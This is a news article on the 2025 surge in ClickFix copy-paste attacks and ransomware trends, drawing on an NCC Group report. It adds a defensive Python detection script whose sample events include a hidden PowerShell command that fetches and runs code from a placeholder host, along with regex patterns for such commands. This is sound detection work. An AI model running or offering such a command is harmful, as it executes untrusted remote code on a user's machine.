**ClickFix Attacks Surge at End of 2025: Cybersecurity Experts Warn of Increasing Threat**

The number of ClickFix or ClearFake attacks that bypass security controls and use unwitting victims to execute a cyber attack is surging at the end of 2025. According to NCC Group's latest monthly threat report, these attacks have increased by over 500% in the first six months of this year alone.

First identified two years ago, ClickFix attacks flooded the threat landscape during 2024 and have continued to rise in volume. Unlike phishing or clickjacking attacks, which rely on automated exploits or malicious attachments, ClickFix attacks exploit human fallibility by convincing targets to manually execute attacks using tools like PowerShell, the Windows Run box, or other shell utilities.

Victims are lured to compromised websites that present fake prompts instructing them to copy a command into their Run dialogue or PowerShell window. This shift in social engineering challenges traditional detection models because the command originates from a trusted user process, rather than an untrusted download or exploit chain.

"Understanding and mitigating ClickFix attacks is crucial because it can bypass conventional defences," said the NCC team. "Email filters, sandboxing, and automated URL analysers cannot always flag a malicious action that is conducted manually by an end user."

Once the payload is executed, attackers can deploy Remote Access Trojans (RATs), enabling persistence, credential harvesting, and eventual ransomware deployment. Financially motivated cyber criminals have been quick to climb on board the ClickFix wagon, many of them operating in larger access broker ecosystems to sell on compromised endpoints to ransomware gangs.

The report details a number of targeted ClickFix operations. One campaign, active from April 2025 until just a couple of months ago, targeted the hospitality sector and duped employees into spreading infostealer malware across multiple hotel chains. This campaign used the PureRAT remote access trojan (RAT) to steal the hotels' Booking.com credentials and conduct downstream email and WhatsApp phishing attacks against guests.

Another campaign, run by Kimsuky, a North Korean state threat actor, prompted its victims to copy and paste bogus authentication codes into PowerShell after posing as a US national security aide trying to set up meetings on South Korean issues.

**Defending Against ClickFix Attacks**

Defending against ClickFix attacks is largely a matter of reducing an organisation's exposure to malicious lures and deceptive landing sites with tools such as URL filtering, domain reputation controls, web filtering, and sandboxing. Tightening endpoint execution environments is also a must, as is strengthening user awareness and instructing all employees to treat any unsolicited copy-paste instruction as an attempted cyber attack.
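Because the pasted command runs under a trusted user process, one place to look for it on the endpoint is process-creation telemetry. The sketch below is an added example, not taken from the NCC report: it assumes Sysmon-style Event ID 1 fields (`User`, `Image`, `ParentImage`, `CommandLine`), that a Run-box launch shows `explorer.exe` as the parent, and an illustrative trait list and threshold that would need tuning locally.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Interpreters a pasted Run-box command typically starts (assumed list; tune locally).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits that are unusual for a hand-typed command (assumed heuristics).
TRAITS = {
    "hidden_window": re.compile(r"-w[a-z]*\s+hidden\b", re.I),
    "encoded_command": re.compile(r"\s-e[a-z]*\s+[A-Za-z0-9+/=]{16,}", re.I),
    "remote_fetch": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl)\b", re.I),
    "inline_eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "url_argument": re.compile(r"https?://", re.I),
}

def matched_traits(ev):
    """Traits matched by one process-creation event; [] when it is out of scope."""
    if basename(ev["ParentImage"]).lower() != "explorer.exe":
        return []  # not launched from the user's desktop shell (Run box, Start menu)
    if basename(ev["Image"]).lower() not in SHELLS:
        return []
    return [name for name, rx in TRAITS.items() if rx.search(ev["CommandLine"])]

def triage(events, threshold=2):
    """Return (user, image, traits) for events matching at least `threshold` traits."""
    hits = []
    for ev in events:
        traits = matched_traits(ev)
        if len(traits) >= threshold:
            hits.append((ev["User"], basename(ev["Image"]).lower(), traits))
    return hits

# Constructed sample events using Sysmon Event ID 1 field names; not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [
    {"User": "HOTEL\\frontdesk1", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify)"'},
    {"User": "HOTEL\\itadmin", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},
    {"User": "HOTEL\\frontdesk2", "ParentImage": EXPLORER,
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c ipconfig /all"},
    {"User": "HOTEL\\backoffice", "Image": PS,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell -w hidden -c Get-Date"},
]

if __name__ == "__main__":
    for user, image, traits in triage(SAMPLE_EVENTS):
        print(f"ALERT {user} ran {image} from explorer.exe: {', '.join(traits)}")
```

A command pasted into a PowerShell window that is already open creates no new process, so this check will not see it; PowerShell script block logging is the complementary source for that case.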

**Ransomware Activity Levels Off**

The growth in ClickFix attacks came amid a plateauing of general cyber attack volumes during the past few weeks. Tracked ransomware hits fell 2% in November, NCC found. The Qilin operation held firm as the most active gang observed in NCC's telemetry, accounting for 101 attacks, followed by Cl0p with 98, Akira with 81, and INC Ransom with 49.

Also notable in November was the DragonForce gang – NCC attributed 19 attacks to it during the period, although it has claimed many more itself. This gang became one of the more prominent active cyber gangs this year thanks to its reliance on collaboration with highly skilled affiliates, including Scattered Spider, the hacking collective that hit Marks & Spencer, among many others.

**Collaboration Between Threat Actors**

Although collaboration between threat actors is nothing new, NCC said that DragonForce's activity showed how gangs can maximise such strategies to strengthen their capabilities. At the same time, DragonForce has also taken something of a sledgehammer to the concept of honour among thieves.

In May, it was observed hacking and defacing the data leak sites of rival gangs, and at one point initiated a hostile takeover bid of the RansomHub crew. NCC said this competitiveness may reflect the lowering of technical barriers to participation in the cyber criminal ecosystem.

**Business Leaders Must Stay Vigilant**

"Business leaders cannot afford to become complacent," said Matt Hull, NCC global head of threat intel. "Threat groups are rapidly evolving, sharing tools and techniques, and already exploiting the festive period, when vigilance often drops."

With the new Cyber Security and Resilience Bill and high-profile breaches at M&S, Co-op, and JLR this year, organisations are under growing scrutiny to prove they have robust defences and incident response plans in place.